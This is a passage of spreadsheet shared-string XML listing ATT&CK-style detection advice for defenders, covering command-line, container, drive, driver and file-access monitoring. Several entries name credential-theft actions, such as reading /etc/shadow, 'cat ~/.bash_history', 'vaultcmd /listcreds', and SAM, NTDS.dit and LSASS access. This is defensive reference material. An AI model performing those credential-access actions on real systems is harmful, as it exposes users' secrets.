    <t>Monitor systems for abnormal Python usage and python.exe behavior, which could be an indicator of malicious activity. Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor executed commands and arguments that may abuse Python commands and scripts for execution.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that may interact with the Windows Registry to gather information about the system, configuration, and installed software.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments resulting from RC scripts for unusual or unknown applications or behavior</t>
  </si>
  <si>
    <t>monitor service creation that uses cmd.exe /k or cmd.exe /c in its arguments to detect RDP session hijacking.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may modify plist files to automatically run an application when a user logs in.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key.</t>
  </si>
  <si>
    <t>Command arguments used before and after Regsvcs.exe or Regasm.exe invocation may also be useful in determining the origin and purpose of the binary being executed.</t>
  </si>
  <si>
    <t>Command arguments used before and after the regsvr32.exe invocation may also be useful in determining the origin and purpose of the script or DLL being loaded. (Citation: Carbon Black Squiblydoo Apr 2016)</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that may target an Exchange server, Office 365, or Google Workspace to collect sensitive information.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may take control of preexisting sessions with remote services to move laterally in an environment.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. For network devices, monitor executed commands in AAA logs, especially those run by unexpected or unauthorized users.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that could be taken to gather...</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that are leveraging the use of resource forks, especially those immediately followed by potentially malicious activity such as creating network connections.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor executed commands and arguments that may indicate common cryptomining functionality </t>
  </si>
  <si>
    <t xml:space="preserve">Monitor command-line usage for &lt;code&gt;-AllowReversiblePasswordEncryption $true&lt;/code&gt; or other actions that could be related to malicious tampering of user settings (i.e. [Group Policy Modification](https://attack.mitre.org/techniques/T1484/001)). </t>
  </si>
  <si>
    <t>Consider monitoring for commands and arguments that may be atypical for benign use of virtualization software. Usage of virtualization binaries or command-line arguments associated with running a silent installation may be especially suspect (ex. &lt;code&gt;-silent&lt;/code&gt;, &lt;code&gt;-ignore-reboot&lt;/code&gt;), as well as those associated with running a headless (in the background with no UI) virtual instance (ex. &lt;code&gt;VBoxManage startvm $VM --type headless&lt;/code&gt;).(Citation: Shadowbunny VM Defense Evasion) Similarly, monitoring command line arguments which suppress notifications may highlight potentially malicious activity (ex. &lt;code&gt;VBoxManage.exe setextradata global GUI/SuppressMessages "all"&lt;/code&gt;). Monitor for commands which enable hypervisors such as Hyper-V.</t>
  </si>
  <si>
    <t>Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that connect to remote shares, such as [Net](https://attack.mitre.org/software/S0039), on the command-line interface and Discovery techniques that could be used to find remotely accessible systems.(Citation: Medium Detecting WMI Persistence)</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments to modify the authorized_keys or /etc/ssh/sshd_config files.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may hijack a legitimate user's SSH session to move laterally within an environment.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments associated with making configuration changes to boot settings, such as &lt;code&gt;bcdedit.exe&lt;/code&gt; and &lt;code&gt;bootcfg.exe&lt;/code&gt;.(Citation: Microsoft bcdedit 2021)(Citation: Microsoft Bootcfg)(Citation: Sophos Snatch Ransomware 2019)</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that could be taken to gather tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to take screen captures of the desktop to gather information over the course of an operation.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments of .scr files.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may abuse security support providers (SSPs) to execute DLLs when the system boots.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may abuse the Windows service control manager to execute malicious commands or payloads.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may stop or disable services on a system to render those services unavailable to legitimate users.</t>
  </si>
  <si>
    <t>Monitor for the execution of commands and arguments that can be used for adversaries to modify services' registry keys and values through applications such as Windows Management Instrumentation and PowerShell. Additional logging may need to be configured to gather the appropriate data.</t>
  </si>
  <si>
    <t>Monitor for execution of utilities, like chmod, and their command-line arguments to look for setuid or setguid bits being set.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment.</t>
  </si>
  <si>
    <t>Monitor for the execution of commands and other utilities abused to forge and/or steal certificates and related private keys.(Citation: SpecterOps Certified Pre Owned)</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003).</t>
  </si>
  <si>
    <t>Command monitoring may reveal malicious attempts to modify trust settings, such as the installation of root certificates or modifications to trust attributes/policies applied to files.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may perform sudo caching and/or use the suoders file to elevate privileges, such as the &lt;code&gt;sudo&lt;/code&gt; command.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may forge credential materials that can be used to gain access to web applications or Internet services.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may employ various means to detect and avoid virtualization and analysis environments. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. For network devices, monitor executed commands in AAA logs, especially those run by unexpected or unauthorized users.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to gather information about the system language of a victim in order to infer the geographical location of that host.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may gather information in an attempt to calculate the geographical location of a victim host.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. For network devices, monitor executed commands in AAA logs, especially those run by unexpected or unauthorized users.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
For network devices, monitor executed commands in AAA logs, especially those run by unexpected or unauthorized users.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that could be taken to gather system information related to services.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t>
  </si>
  <si>
    <t>Monitor for command line invocations of tools capable of modifying services that doesn’t correspond to normal usage patterns and known software, patch cycles, etc.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments of binaries involved in shutting down or rebooting systems. For network devices, monitor executed commands in AAA logs, especially those run by unexpected or unauthorized users.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that may gather the system time and/or time zone from a local or remote system.</t>
  </si>
  <si>
    <t>Suspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: &lt;code&gt;systemctl list-units -–type=service –all&lt;/code&gt;. Auditing the execution and command-line arguments of the 'systemctl' utility, as well related utilities such as &lt;code&gt;/usr/sbin/service&lt;/code&gt; may reveal malicious systemd service execution.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments the 'systemd-run' utility as it may be used to create timers</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for potential adversary actions to modify Registry values (ex: &lt;code&gt;reg.exe&lt;/code&gt;) or modify/replace the legitimate &lt;code&gt;termsrv.dll&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may employ various time-based methods to detect and avoid virtualization and analysis environments. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may abuse time providers to execute DLLs when the system boots.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments to detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may establish persistence by executing malicious content triggered by an interrupt signal.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may abuse Unix shell commands and scripts for execution. Unix shell usage may be common on administrator, developer, or power user systems, depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may establish persistence through executing malicious commands triggered by a user’s shell.</t>
  </si>
  <si>
    <t>While detecting adversaries accessing credentials may be difficult without knowing they exist in the environment, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.</t>
  </si>
  <si>
    <t>Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.</t>
  </si>
  <si>
    <t>Command arguments used before and after the invocation of verclsid.exe may also be useful in determining the origin and purpose of the payload being executed.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may abuse Visual Basic (VB) for execution.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may abuse the Windows command shell for execution. Usage of the Windows command shell may be common on administrator, developer, or power user systems depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for suspicious activity listing credentials from the Windows Credentials locker (e.g. &lt;code&gt;vaultcmd /listcreds:“Windows Credentials”&lt;/code&gt;).(Citation: Malwarebytes The Windows Vault)</t>
  </si>
  <si>
    <t>Monitor for executed commands and arguments for PowerShell cmdlets that can be used to retrieve or modify file and directory DACLs.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments for actions that are used to perform remote behavior</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that can be used to register WMI persistence, such as the &lt;code&gt; Register-WmiEvent&lt;/code&gt; [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet (Citation: Microsoft Register-WmiEvent)</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may invoke a WinRM script to correlate it with other related events.(Citation: Medium Detecting Lateral Movement)</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could create or modify services. Command-line invocation of tools capable of adding or modifying services may be unusual, depending on how systems are typically used in a particular environment. Services may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. Also collect service utility execution and service binary path arguments used for analysis. Service binary paths may even be changed to execute commands or scripts.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.</t>
  </si>
  <si>
    <t>Monitor executed commands and arguments that may modify XDG autostart entries to execute programs or commands during system boot.</t>
  </si>
  <si>
    <t>Monitor for newly constructed containers</t>
  </si>
  <si>
    <t>Monitor for newly constructed containers that may deploy a container into an environment to facilitate execution or evade defenses.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for the deployment of suspicious or unknown container images and pods in your environment, particularly containers running as root. </t>
  </si>
  <si>
    <t>Track the deployment of new containers, especially from newly built images.</t>
  </si>
  <si>
    <t>Monitor for newly constructed containers that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.</t>
  </si>
  <si>
    <t>Monitor for newly constructed containers that may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel.</t>
  </si>
  <si>
    <t>Monitor logs for actions that could be taken to gather information about container infrastructure, including the use of discovery API calls by new or unexpected users. Monitor account activity logs to see actions performed and activity associated with the Kubernetes dashboard and other web applications.</t>
  </si>
  <si>
    <t>Monitor for activation or invocation of a container that may deploy a container into an environment to facilitate execution or evade defenses.</t>
  </si>
  <si>
    <t>Monitor the behavior of containers within the environment to detect anomalous behavior or malicious activity after users deploy from malicious images.</t>
  </si>
  <si>
    <t>Monitor for the activation or invocation of a container (ex: docker start or docker restart)</t>
  </si>
  <si>
    <t>Consider use of services that may aid in tracking of newly acquired infrastructure, such as WHOIS databases for domain registration information. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.</t>
  </si>
  <si>
    <t>Domain registration information is, by design, captured in public registration logs. Consider use of services that may aid in tracking of newly acquired domains, such as WHOIS databases and/or passive DNS. In some cases it may be possible to pivot on known pieces of domain registration information to uncover other infrastructure purchased by the adversary. Consider monitoring for domains created with a similar structure to your own, including under a different TLD. Though various tools and services exist to track, query, and monitor domain name registration information, tracking across multiple DNS infrastructures can require multiple tools/services or more advanced analytics.(Citation: ThreatConnect Infrastructure Dec 2020) Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control.</t>
  </si>
  <si>
    <t>Monitor for unexpected file access on removable media</t>
  </si>
  <si>
    <t>Monitor handle opens on volumes that are made by processes to determine when they may be directly collecting data from logical drives. (Citation: Github PowerSploit Ninjacopy)</t>
  </si>
  <si>
    <t>Monitor for newly constructed drive letters or mount points to a data storage device for attempts to write to sensitive locations like the partition boot sector, master boot record, disk partition table, or BIOS parameter block/superblock.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly executed processes when removable media is mounted. </t>
  </si>
  <si>
    <t>Monitor for newly assigned drive letters or mount points to a data storage device that may attempt to exfiltrate data via a physical medium, such as a removable drive.</t>
  </si>
  <si>
    <t>Monitor for newly assigned drive letters or mount points to a data storage device that may attempt to exfiltrate data over a USB connected physical device.</t>
  </si>
  <si>
    <t>Monitor for newly constructed drives or other related events associated with computer hardware and other accessories (especially new or unknown) being connected to systems. Endpoint sensors may be able to detect the addition of hardware via USB, Thunderbolt, and other external device communication ports.</t>
  </si>
  <si>
    <t>Monitor for newly constructed drive letters or mount points to removable media</t>
  </si>
  <si>
    <t>Monitor for changes to MBR and VBR as they occur for indicators for suspicious activity and further analysis. Take snapshots of MBR and VBR and compare against known good samples.</t>
  </si>
  <si>
    <t>Monitor for changes made to drive letters or mount points of data storage devices for attempts to read to sensitive locations like the partition boot sector, master boot record, disk partition table, or BIOS parameter block/superblock.</t>
  </si>
  <si>
    <t>Monitor for changes made to drive letters or mount points of data storage devices for unexpected modifications that may be used by rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components.</t>
  </si>
  <si>
    <t>Monitor for unusual kernel driver installation activity that may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems.</t>
  </si>
  <si>
    <t>Monitor for new service driver installations and loads (ex: Sysmon Event ID 6) that are not part of known software update/patch cycles.</t>
  </si>
  <si>
    <t>Monitor for unusual/suspicious driver activity, especially regarding EDR and drivers associated with security tools as well as those that may be abused to disable security products.</t>
  </si>
  <si>
    <t>Monitor for unusual kernel driver installation activity may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.</t>
  </si>
  <si>
    <t>Monitor for unusual kernel driver installation activity may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources.</t>
  </si>
  <si>
    <t>Monitor for unusual kernel driver installation activity that may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources.</t>
  </si>
  <si>
    <t>Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution or evidence of Discovery. Consider monitoring for the presence or loading (ex: Sysmon Event ID 6) of known vulnerable drivers that adversaries may drop and exploit to execute code in kernel mode.(Citation: Microsoft Driver Block Rules) Higher privileges are often necessary to perform additional actions such as some methods of [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Look for additional activity that may indicate an adversary has gained higher privileges.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for unusual kernel driver installation activity </t>
  </si>
  <si>
    <t>With LSA Protection enabled, monitor the event logs (Events 3033 and 3063) for failed attempts to load LSA plug-ins and drivers. (Citation: Microsoft LSA Protection Mar 2014) Utilize the Sysinternals Autoruns/Autorunsc utility (Citation: TechNet Autoruns) to examine loaded drivers associated with the LSA.</t>
  </si>
  <si>
    <t>Monitor for use of proxied smart card connections by an adversary may be difficult because it requires the token to be inserted into a system; thus it is more likely to be in use by a legitimate user and blend in with other network behavior. Similar to [Input Capture](https://attack.mitre.org/techniques/T1056), keylogging activity can take various forms but can may be detected via installation of a driver.</t>
  </si>
  <si>
    <t>Monitor for unusual kernel driver installation activity that may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation.</t>
  </si>
  <si>
    <t>Monitor for unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation</t>
  </si>
  <si>
    <t>Disk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation</t>
  </si>
  <si>
    <t>Monitor for files being accessed that may attempt to dump the contents of &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt; to enable offline password cracking. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes attempting to access &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt;, alerting on the pid, process name, and arguments of such programs.</t>
  </si>
  <si>
    <t>Monitor access to file resources that contain local accounts and groups information such as &lt;code&gt;/etc/passwd&lt;/code&gt;, &lt;code&gt;/Users&lt;/code&gt; directories, and the SAM database. 
If access requires high privileges, look for non-admin objects (such as users or processes) attempting to access restricted file resources.</t>
  </si>
  <si>
    <t>Monitor for unexpected files (e.g., .pdf, .docx, .jpg, etc.) viewed for collecting internal data.</t>
  </si>
  <si>
    <t>Monitor for abnormal access to files (i.e. .pdf, .docx, .jpg, etc.), especially sensitive documents, through the use of automated processing after being gathered during Collection.</t>
  </si>
  <si>
    <t>Monitoring when the user's &lt;code&gt;.bash_history&lt;/code&gt; is read can help alert to suspicious activity.</t>
  </si>
  <si>
    <t>Monitor for unexpected browser bookmarks viewed in isolation, this showcases part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for files being accessed that may search local file systems and remote file shares for files containing insecurely stored credentials. While detecting adversaries accessing these files may be difficult without knowing they exist in the first place, it may be possible to detect adversary use of credentials they have obtained. </t>
  </si>
  <si>
    <t>Monitor for files being accessed that may search for common password storage locations to obtain user credentials.</t>
  </si>
  <si>
    <t>Identify web browser files that contain credentials such as Google Chrome’s Login Data database file: &lt;code&gt;AppData\Local\Google\Chrome\User Data\Default\Login Data&lt;/code&gt;. Monitor file read events of web browser files that contain credentials, especially when the reading process is unrelated to the subject web browser.</t>
  </si>
  <si>
    <t>Monitor processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib.</t>
  </si>
  <si>
    <t>Monitor for unexpected/abnormal access to files that may be malicious collection of local data, such as user files (pdf, .docx, .jpg, etc.) or local databases.</t>
  </si>
  <si>
    <t>Monitor for unexpected files (i.e. .pdf, .docx, .jpg, etc.)  interacting with network shares.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for unexpected/abnormal file accesses to removable media (optical disk drive, USB memory, etc.) connected to the compromised system. </t>
  </si>
  <si>
    <t>Monitor for unusual processes access of local system email files for Exfiltration, unusual processes connecting to an email server within a network, or unusual access patterns or authentication attempts on a public-facing webmail server may all be indicators of malicious activity.</t>
  </si>
  <si>
    <t>Monitor for suspicious files (i.e. .pdf, .docx, .jpg, etc.) viewed in isolation that may steal data by exfiltrating it over a different protocol than that of the existing command and control channel.</t>
  </si>
  <si>
    <t>Monitor files viewed in isolation that may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for files being accessed that could be related to exfiltration, such as file reads by a process that also has an active network connection. Also monitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces. </t>
  </si>
  <si>
    <t>Monitor for suspicious files (i.e. .pdf, .docx, .jpg, etc.) viewed in isolation that may steal data by exfiltrating it over an existing command and control channel.</t>
  </si>
  <si>
    <t>Monitor for files being accessed that could be related to exfiltration, such as file reads by a process that also has an active network connection.</t>
  </si>
  <si>
    <t>Monitor file access on removable media that may attempt to exfiltrate data via a physical medium, such as a removable drive.</t>
  </si>
  <si>
    <t>Monitor for files viewed in isolation that may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel.</t>
  </si>
  <si>
    <t>Monitor for files being accessed by an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel.</t>
  </si>
  <si>
    <t>Monitor file access on removable media that may attempt to exfiltrate data over a USB connected physical device.</t>
  </si>
  <si>
    <t>Monitor for files being accessed to exfiltrate data to a cloud storage service rather than over their primary command and control channel.</t>
  </si>
  <si>
    <t>Monitor for files being accessed to exfiltrate data to a code repository rather than over their primary command and control channel.</t>
  </si>
  <si>
    <t>Monitor for unexpected files used to gather credentials when the files are rendered</t>
  </si>
  <si>
    <t>Monitor for attempts to access SYSVOL that involve searching for XML files.</t>
  </si>
  <si>
    <t>Monitor for Keychain files being accessed that may be related to malicious credential collection.</t>
  </si>
  <si>
    <t>Monitor access to file resources that contain local accounts and groups information such as &lt;code&gt;/etc/passwd&lt;/code&gt;, &lt;code&gt;/Users&lt;/code&gt; directories, and the Windows SAM database. 
If access requires high privileges, look for non-admin objects (such as users or processes) attempting to access restricted file resources.</t>
  </si>
  <si>
    <t>Monitor for unusual processes accessing local email files that may target user email on local systems to collect sensitive information.</t>
  </si>
  <si>
    <t>Monitor for access or copy of the NTDS.dit.</t>
  </si>
  <si>
    <t>Monitor for hash dumpers opening the Security Accounts Manager (SAM) on the local file system (&lt;code&gt;%SystemRoot%/system32/config/SAM&lt;/code&gt;). Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised ( LinkById: T1078) in-use by adversaries may help as well.</t>
  </si>
  <si>
    <t>Monitor file reads that may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity. </t>
  </si>
  <si>
    <t>Monitor for unexpected access to passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path &lt;code&gt;/proc/\/maps&lt;/code&gt;, where the &lt;code&gt;\&lt;/code&gt; directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.</t>
  </si>
  <si>
    <t>Monitor for files (such as &lt;code&gt;/etc/hosts&lt;/code&gt;) being accessed that may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system.</t>
  </si>
  <si>
    <t>Monitor for unexpected files accessed on removable media.</t>
  </si>
  <si>
    <t>Monitor for hash dumpers opening the Security Accounts Manager (SAM) on the local file system (&lt;code&gt;%SystemRoot%/system32/config/SAM&lt;/code&gt;). Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.</t>
  </si>
  <si>
    <t>Monitor for an attempt by a user to gain access to a network or computing resource, often by providing credentials to cloud service management consoles. Some cloud providers, such as AWS, provide distinct log events for login attempts to the management console.</t>
  </si>
  <si>
    <t>Monitor for attempts to access files that store information about certificates and their associated private keys. For example, personal certificates for users may be stored on disk in folders such as `%APPDATA%\Microsoft\SystemCertificates\My\Certificates\`.(Citation: SpecterOps Certified Pre Owned)(Citation: O365 Blog Azure AD Device IDs)</t>
  </si>
  <si>
    <t>Monitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as  [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored. Monitor for unusual processes accessing &lt;code&gt;secrets.ldb&lt;/code&gt; and &lt;code&gt;.secrets.mkey&lt;/code&gt; located in &lt;code&gt;/var/lib/sss/secrets/&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Monitor for hash dumpers opening the Security Accounts Manager (SAM) on the local file system (&lt;code&gt;%SystemRoot%/system32/config/SAM&lt;/code&gt;). Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised  [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.</t>
  </si>
  <si>
    <t>Monitor for suspicious file access activity, specifically indications that a process is reading multiple files in a short amount of time and/or using command-line arguments indicative of searching for credential material (ex: regex patterns). These may be indicators of automated/scripted credential access behavior. Monitoring when the user's &lt;code&gt;.bash_history&lt;/code&gt; is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like "history" instead of commands like &lt;code&gt;cat ~/.bash_history&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Consider monitoring file reads to Vault locations, &lt;code&gt;&amp;percnt;Systemdrive&amp;percnt;&amp;bsol;Users&amp;bsol;&amp;bsol;&amp;lsqb;Username&amp;rsqb;&amp;bsol;AppData&amp;bsol;Local&amp;bsol;Microsoft&amp;bsol;&amp;bsol;&amp;lsqb;Vault&amp;sol;Credentials&amp;rsqb;&amp;bsol;&lt;/code&gt;, for suspicious activity.(Citation: Malwarebytes The Windows Vault)</t>
  </si>
  <si>
    <t>Monitor newly constructed files that may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features.</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may abuse Microsoft Office add-ins to obtain persistence on a compromised system.</t>
  </si>
  <si>
    <t>Monitor newly constructed files being written with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems.</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may use scripts automatically executed at boot or logon initialization to establish persistence.</t>
  </si>
  <si>
    <t>Monitor for newly constructed files and/or all installed extensions maintain a plist file in the /Library/Managed Preferences/username/ directory. Ensure all listed files are in alignment with approved extensions</t>
  </si>
  <si>
    <t>Monitor for newly constructed files for payloads</t>
  </si>
  <si>
    <t>Monitor presence and use of CHM files, especially if they are not typically used within an environment.</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may modify client software binaries to establish persistent access to systems.</t>
  </si>
  <si>
    <t>Monitor for newly constructed files by using the logging agents on Kubernetes nodes and retrieve logs from sidecar proxies for application and resource pods to monitor malicious container orchestration job deployments.</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may forge web cookies that can be used to gain access to web applications or Internet services.</t>
  </si>
  <si>
